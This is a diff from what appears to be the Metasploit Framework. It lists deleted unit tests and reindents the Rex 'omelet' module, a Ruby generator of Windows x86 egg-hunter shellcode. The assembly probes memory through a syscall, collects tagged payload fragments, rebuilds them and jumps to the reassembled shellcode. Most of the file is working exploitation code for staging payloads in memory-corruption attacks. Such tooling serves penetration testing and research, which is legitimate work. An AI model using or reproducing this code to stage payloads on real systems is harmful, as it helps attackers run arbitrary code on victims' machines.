data/lib/rex/proto/http/packet.rb.ut.rb +0 -166
data/lib/rex/proto/http/request.rb.ut.rb +0 -215
data/lib/rex/proto/http/response.rb.ut.rb +0 -150
data/lib/rex/proto/http/server.rb.ut.rb +0 -80
data/lib/rex/proto/ntlm.rb.ut.rb +0 -181
data/lib/rex/proto/rfb.rb.ut.rb +0 -40
data/lib/rex/proto/smb.rb.ts.rb +0 -9
data/lib/rex/proto/smb/client.rb.ut.rb +0 -224
data/lib/rex/proto/smb/constants.rb.ut.rb +0 -19
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -129
data/lib/rex/proto/smb/utils.rb.ut.rb +0 -21
data/lib/rex/proto/tftp/server.rb.ut.rb +0 -29
data/lib/rex/service_manager.rb.ut.rb +0 -33
data/lib/rex/socket.rb.ut.rb +0 -108
data/lib/rex/socket/comm/local.rb.ut.rb +0 -76
data/lib/rex/socket/parameters.rb.ut.rb +0 -52
data/lib/rex/socket/range_walker.rb.ut.rb +0 -56
data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -40
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -62
data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -29
data/lib/rex/socket/switch_board.rb.ut.rb +0 -53
data/lib/rex/socket/tcp.rb.ut.rb +0 -65
data/lib/rex/socket/tcp_server.rb.ut.rb +0 -45
data/lib/rex/socket/udp.rb.ut.rb +0 -45
data/lib/rex/test.rb +0 -36
data/lib/rex/text.rb.ut.rb +0 -193
data/lib/rex/transformer.rb.ut.rb +0 -39
data/lib/rex/ui/text/color.rb.ut.rb +0 -19
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -35
data/lib/rex/ui/text/table.rb.ut.rb +0 -56

data/lib/rex/exploitation/omelet.rb CHANGED

@@ -16,305 +16,305 @@ module Exploitation
 ###
 class Omelet
-	###
-	#
-	# Windows-based eggs-to-omelet hunters
-	#
-	###
-	module Windows
-		Alias = "win"
-		module X86
-			Alias = ARCH_X86
-			#
-			# The hunter stub for win/x86.
-			#
-			def hunter_stub
-				{
-					# option hash members go here (currently unused)
-				}
-			end
-		end
-	end
-	###
-	#
-	# Generic interface
-	#
-	###
-	#
-	# Creates a new hunter instance and acquires the sub-class that should
-	# be used for generating the stub based on the supplied platform and
-	# architecture.
-	#
-	def initialize(platform, arch = nil)
-		Omelet.constants.each { |c|
-			mod = self.class.const_get(c)
-			next if ((!mod.kind_of?(::Module)) or (!mod.const_defined?('Alias')))
-			if (platform =~ /#{mod.const_get('Alias')}/i)
-				self.extend(mod)
-				if (arch and mod)
-					mod.constants.each { |a|
-						amod = mod.const_get(a)
-						next if ((!amod.kind_of?(::Module)) or
-							(!amod.const_defined?('Alias')))
-						if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
-								amod = mod.const_get(a)
-								self.extend(amod)
-							end
-						}
-					end
-				end
-			}
-		end
-		#
-		# This method generates an eggs-to-omelet hunter using the derived hunter stub.
-		#
-		def generate(payload, badchars = '', opts = {})
-			eggsize       = opts[:eggsize] || 123
-			eggtag        = opts[:eggtag] || "00w"
-			searchforward = opts[:searchforward] || true
-			reset         = opts[:reset]
-			startreg      = opts[:startreg]
-			usechecksum   = opts[:checksum]
-			adjust        = opts[:adjust] || 0
-			return nil if ((opts = hunter_stub) == nil)
-			# calculate number of eggs
-			payloadlen = payload.length
-			delta = payloadlen / eggsize
-			delta = delta * eggsize
-			nr_eggs = payloadlen / eggsize
-			if delta < payloadlen
-				nr_eggs = nr_eggs+1
-			end
-			nr_eggs_hex = "%02x" % nr_eggs
-			eggsize_hex = "%02x" % eggsize
-			hextag = ''
-			eggtag.each_byte do |thischar|
-				decchar = "%02x" % thischar
-				hextag = decchar + hextag
-			end
-			hextag = hextag + "01"
-			# search forward or backward ?
-			setflag      = nil
-			searchstub1  = nil
-			searchstub2  = nil
-			flipflagpre  = ''
-			flipflagpost = ''
-			checksum     = ''
-			if searchforward
-				# clear direction flag
-				setflag     = "cld"
-				searchstub1 = "dec edx\n\tdec edx\n\tdec edx\n\tdec edx"
-				searchstub2 = "inc edx"
-			else
-				# set the direction flag
-				setflag      = "std"
-				searchstub1  = "inc edx\n\tinc edx\n\tinc edx\n\tinc edx"
-				searchstub2  = "dec edx"
-				flipflagpre  = "cld\n\tsub esi,-8"
-				flipflagpost = "std"
-			end
-			# will we have to adjust the destination address ?
-			adjustdest = ''
-			if adjust > 0
-				adjustdest = "\n\tsub edi,#{adjust}"
-			elsif adjust < 0
-				adjustdest = "\n\tadd edi,#{adjust}"
-			end
-			# prepare the stub that starts the search
-			startstub = ''
-			if startreg
-				if startreg.downcase != 'ebp'
-					startstub << "mov ebp,#{startreg}"
-				end
-				startstub << "\n\t" if startstub.length > 0
-				startstub << "mov edx,ebp"
-			end
-			# a register will be used as start location for the search
-			startstub << "\n\t" if startstub.length > 0
-			startstub << "push esp\n\tpop edi\n\tor di,0xffff"
-			startstub << adjustdest
-			# edx will be used, start at end of stack frame
-			if not startreg
-				startstub << "\n\tmov edx,edi"
-				if reset
-					startstub << "\n\tpush edx\n\tpop ebp"
-				end
-			end
-			# reset start after each egg was found ?
-			# will allow to find eggs when they are out of order/sequence
-			resetstart = ''
-			if reset
-				resetstart = "push ebp\n\tpop edx"
-			end
+  ###
+  #
+  # Windows-based eggs-to-omelet hunters
+  #
+  ###
+  module Windows
+    Alias = "win"
+    module X86
+      Alias = ARCH_X86
+      #
+      # The hunter stub for win/x86.
+      #
+      def hunter_stub
+        {
+          # option hash members go here (currently unused)
+        }
+      end
+    end
+  end
+  ###
+  #
+  # Generic interface
+  #
+  ###
+  #
+  # Creates a new hunter instance and acquires the sub-class that should
+  # be used for generating the stub based on the supplied platform and
+  # architecture.
+  #
+  def initialize(platform, arch = nil)
+    Omelet.constants.each { |c|
+      mod = self.class.const_get(c)
+      next if ((!mod.kind_of?(::Module)) or (!mod.const_defined?('Alias')))
+      if (platform =~ /#{mod.const_get('Alias')}/i)
+        self.extend(mod)
+        if (arch and mod)
+          mod.constants.each { |a|
+            amod = mod.const_get(a)
+            next if ((!amod.kind_of?(::Module)) or
+              (!amod.const_defined?('Alias')))
+            if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
+                amod = mod.const_get(a)
+                self.extend(amod)
+              end
+            }
+          end
+        end
+      }
+    end
+    #
+    # This method generates an eggs-to-omelet hunter using the derived hunter stub.
+    #
+    def generate(payload, badchars = '', opts = {})
+      eggsize       = opts[:eggsize] || 123
+      eggtag        = opts[:eggtag] || "00w"
+      searchforward = opts[:searchforward] || true
+      reset         = opts[:reset]
+      startreg      = opts[:startreg]
+      usechecksum   = opts[:checksum]
+      adjust        = opts[:adjust] || 0
+      return nil if ((opts = hunter_stub) == nil)
+      # calculate number of eggs
+      payloadlen = payload.length
+      delta = payloadlen / eggsize
+      delta = delta * eggsize
+      nr_eggs = payloadlen / eggsize
+      if delta < payloadlen
+        nr_eggs = nr_eggs+1
+      end
+      nr_eggs_hex = "%02x" % nr_eggs
+      eggsize_hex = "%02x" % eggsize
+      hextag = ''
+      eggtag.each_byte do |thischar|
+        decchar = "%02x" % thischar
+        hextag = decchar + hextag
+      end
+      hextag = hextag + "01"
+      # search forward or backward ?
+      setflag      = nil
+      searchstub1  = nil
+      searchstub2  = nil
+      flipflagpre  = ''
+      flipflagpost = ''
+      checksum     = ''
+      if searchforward
+        # clear direction flag
+        setflag     = "cld"
+        searchstub1 = "dec edx\n\tdec edx\n\tdec edx\n\tdec edx"
+        searchstub2 = "inc edx"
+      else
+        # set the direction flag
+        setflag      = "std"
+        searchstub1  = "inc edx\n\tinc edx\n\tinc edx\n\tinc edx"
+        searchstub2  = "dec edx"
+        flipflagpre  = "cld\n\tsub esi,-8"
+        flipflagpost = "std"
+      end
+      # will we have to adjust the destination address ?
+      adjustdest = ''
+      if adjust > 0
+        adjustdest = "\n\tsub edi,#{adjust}"
+      elsif adjust < 0
+        adjustdest = "\n\tadd edi,#{adjust}"
+      end
+      # prepare the stub that starts the search
+      startstub = ''
+      if startreg
+        if startreg.downcase != 'ebp'
+          startstub << "mov ebp,#{startreg}"
+        end
+        startstub << "\n\t" if startstub.length > 0
+        startstub << "mov edx,ebp"
+      end
+      # a register will be used as start location for the search
+      startstub << "\n\t" if startstub.length > 0
+      startstub << "push esp\n\tpop edi\n\tor di,0xffff"
+      startstub << adjustdest
+      # edx will be used, start at end of stack frame
+      if not startreg
+        startstub << "\n\tmov edx,edi"
+        if reset
+          startstub << "\n\tpush edx\n\tpop ebp"
+        end
+      end
+      # reset start after each egg was found ?
+      # will allow to find eggs when they are out of order/sequence
+      resetstart = ''
+      if reset
+        resetstart = "push ebp\n\tpop edx"
+      end
          		#checksum code by dijital1 & corelanc0d3r
-			if usechecksum
-				checksum = <<EOS
-	xor ecx,ecx
-	xor eax,eax
+      if usechecksum
+        checksum = <<EOS
+  xor ecx,ecx
+  xor eax,eax
 calc_chksum_loop:
-	add al,byte [edx+ecx]
-	inc ecx
-	cmp cl, egg_size
-	jnz calc_chksum_loop
+  add al,byte [edx+ecx]
+  inc ecx
+  cmp cl, egg_size
+  jnz calc_chksum_loop
 test_chksum:
-	cmp al,byte [edx+ecx]
-	jnz find_egg
+  cmp al,byte [edx+ecx]
+  jnz find_egg
 EOS
-			end
+      end
-			# create omelet code
-			omelet_hunter = <<EOS
+      # create omelet code
+      omelet_hunter = <<EOS
-	nr_eggs equ 0x#{nr_eggs_hex}	; number of eggs
-	egg_size equ 0x#{eggsize_hex} 	; nr bytes of payload per egg
-	hex_tag equ 0x#{hextag}		; tag
+  nr_eggs equ 0x#{nr_eggs_hex}	; number of eggs
+  egg_size equ 0x#{eggsize_hex} 	; nr bytes of payload per egg
+  hex_tag equ 0x#{hextag}		; tag
-	#{setflag}			; set/clear direction flag
-	jmp start
+  #{setflag}			; set/clear direction flag
+  jmp start
-	; routine to calculate the target location
-	; for writing recombined shellcode (omelet)
-	; I'll use EDI as target location
-	; First, I'll make EDI point to end of stack
-	; and I'll put the number of shellcode eggs in eax
+  ; routine to calculate the target location
+  ; for writing recombined shellcode (omelet)
+  ; I'll use EDI as target location
+  ; First, I'll make EDI point to end of stack
+  ; and I'll put the number of shellcode eggs in eax
 get_target_loc:
-	#{startstub}		; use edx as start location for the search
-	xor eax,eax		; zero eax
-	mov al,nr_eggs		; put number of eggs in eax
+  #{startstub}		; use edx as start location for the search
+  xor eax,eax		; zero eax
+  mov al,nr_eggs		; put number of eggs in eax
 calc_target_loc:
-	xor esi,esi		; use esi as counter to step back
-	mov si,0-(egg_size+20)	; add 20 bytes of extra space, per egg
+  xor esi,esi		; use esi as counter to step back
+  mov si,0-(egg_size+20)	; add 20 bytes of extra space, per egg
 get_target_loc_loop:	; start loop
-	dec edi		; step back
-	inc esi		; and update ESI counter
-	cmp si,-1	; continue to step back until ESI = -1
-	jnz get_target_loc_loop
-	dec eax		; loop again if we did not take all pieces
+  dec edi		; step back
+  inc esi		; and update ESI counter
+  cmp si,-1	; continue to step back until ESI = -1
+  jnz get_target_loc_loop
+  dec eax		; loop again if we did not take all pieces
                ; into account yet
-	jnz calc_target_loc
+  jnz calc_target_loc
-	; edi now contains target location
-	; for recombined shellcode
-	xor ebx,ebx		; put loop counter in ebx
-	mov bl,nr_eggs+1
-	ret
+  ; edi now contains target location
+  ; for recombined shellcode
+  xor ebx,ebx		; put loop counter in ebx
+  mov bl,nr_eggs+1
+  ret
 start:
-	call get_target_loc	; jump to routine which will calculate shellcode dst address
+  call get_target_loc	; jump to routine which will calculate shellcode dst address
-	; start looking for eggs, using edx as basepointer
-	jmp search_next_address
+  ; start looking for eggs, using edx as basepointer
+  jmp search_next_address
 find_egg:
-	#{searchstub1}		; based on search direction
+  #{searchstub1}		; based on search direction
 search_next_address:
-	#{searchstub2}		; based on search direction
-	push edx		; save edx
-	push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
-	pop eax		; set eax to 0x02
-	int 0x2e
-	cmp al,0x5		; address readable ?
-	pop edx		; restore edx
-	je search_next_address  ; if addressss is not readable, go to next address
-	mov eax,hex_tag	; if address is readable, prepare tag in eax
-	add eax,ebx		; add offset (ebx contains egg counter, remember ?)
-	xchg edi,edx		; switch edx/edi
-	scasd			; edi points to the tag ?
-	xchg edi,edx		; switch edx/edi back
-	jnz find_egg		; if tag was not found, go to next address
-	;found the tag at edx
+  #{searchstub2}		; based on search direction
+  push edx		; save edx
+  push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
+  pop eax		; set eax to 0x02
+  int 0x2e
+  cmp al,0x5		; address readable ?
+  pop edx		; restore edx
+  je search_next_address  ; if addressss is not readable, go to next address
+  mov eax,hex_tag	; if address is readable, prepare tag in eax
+  add eax,ebx		; add offset (ebx contains egg counter, remember ?)
+  xchg edi,edx		; switch edx/edi
+  scasd			; edi points to the tag ?
+  xchg edi,edx		; switch edx/edi back
+  jnz find_egg		; if tag was not found, go to next address
+  ;found the tag at edx
    ;do we need to verify checksum ? (prevents finding corrupted eggs)
    #{checksum}
 copy_egg:
-	; ecx must first be set to egg_size (used by rep instruction) and esi as source
-	mov esi,edx		; set ESI = EDX (needed for rep instruction)
-	xor ecx,ecx
-	mov cl,egg_size	; set copy counter
-	#{flipflagpre}		; flip destination flag if necessary
-	rep movsb		; copy egg from ESI to EDI
-	#{flipflagpost}		; flip destination flag again if necessary
-	dec ebx		; decrement egg
-	#{resetstart}		; reset start location if necessary
-	cmp bl,1		; found all eggs ?
-	jnz find_egg		; no = look for next egg
-	; done - all eggs have been found and copied
+  ; ecx must first be set to egg_size (used by rep instruction) and esi as source
+  mov esi,edx		; set ESI = EDX (needed for rep instruction)
+  xor ecx,ecx
+  mov cl,egg_size	; set copy counter
+  #{flipflagpre}		; flip destination flag if necessary
+  rep movsb		; copy egg from ESI to EDI
+  #{flipflagpost}		; flip destination flag again if necessary
+  dec ebx		; decrement egg
+  #{resetstart}		; reset start location if necessary
+  cmp bl,1		; found all eggs ?
+  jnz find_egg		; no = look for next egg
+  ; done - all eggs have been found and copied
 done:
-	call get_target_loc	; re-calculate location where recombined shellcode is placed
-	cld
-	jmp edi		; and jump to it :)
+  call get_target_loc	; re-calculate location where recombined shellcode is placed
+  cld
+  jmp edi		; and jump to it :)
 EOS
-			the_omelet = Metasm::Shellcode.assemble(Metasm::Ia32.new, omelet_hunter).encode_string
+      the_omelet = Metasm::Shellcode.assemble(Metasm::Ia32.new, omelet_hunter).encode_string
-			# create the eggs array
-			total_size = eggsize * nr_eggs
-			padlen = total_size - payloadlen
-			payloadpadding = "A" * padlen
+      # create the eggs array
+      total_size = eggsize * nr_eggs
+      padlen = total_size - payloadlen
+      payloadpadding = "A" * padlen
-			fullcode = payload + payloadpadding
-			eggcnt = nr_eggs + 2
-			startcode = 0
+      fullcode = payload + payloadpadding
+      eggcnt = nr_eggs + 2
+      startcode = 0
-			eggs = []
-			while eggcnt > 2 do
-				egg_prep = eggcnt.chr + eggtag
-				this_egg = fullcode[startcode, eggsize]
+      eggs = []
+      while eggcnt > 2 do
+        egg_prep = eggcnt.chr + eggtag
+        this_egg = fullcode[startcode, eggsize]
             if usechecksum
-					cksum = 0
-					this_egg.each_byte { |b|
-						cksum += b
-					}
-					this_egg << [cksum & 0xff].pack('C')
-				end
+          cksum = 0
+          this_egg.each_byte { |b|
+            cksum += b
+          }
+          this_egg << [cksum & 0xff].pack('C')
+        end
-				this_egg = egg_prep + this_egg
-				eggs << this_egg
+        this_egg = egg_prep + this_egg
+        eggs << this_egg
-				eggcnt -= 1
-				startcode += eggsize
-			end
+        eggcnt -= 1
+        startcode += eggsize
+      end
-			return [ the_omelet, eggs ]
-		end
+      return [ the_omelet, eggs ]
+    end
 protected
-	#
-	# Stub method that is meant to be overridden.  It returns the raw stub that
-	# should be used as the omelet maker (combine the eggs).
-	#
-	def hunter_stub
-	end
+  #
+  # Stub method that is meant to be overridden.  It returns the raw stub that
+  # should be used as the omelet maker (combine the eggs).
+  #
+  def hunter_stub
+  end
 end
 end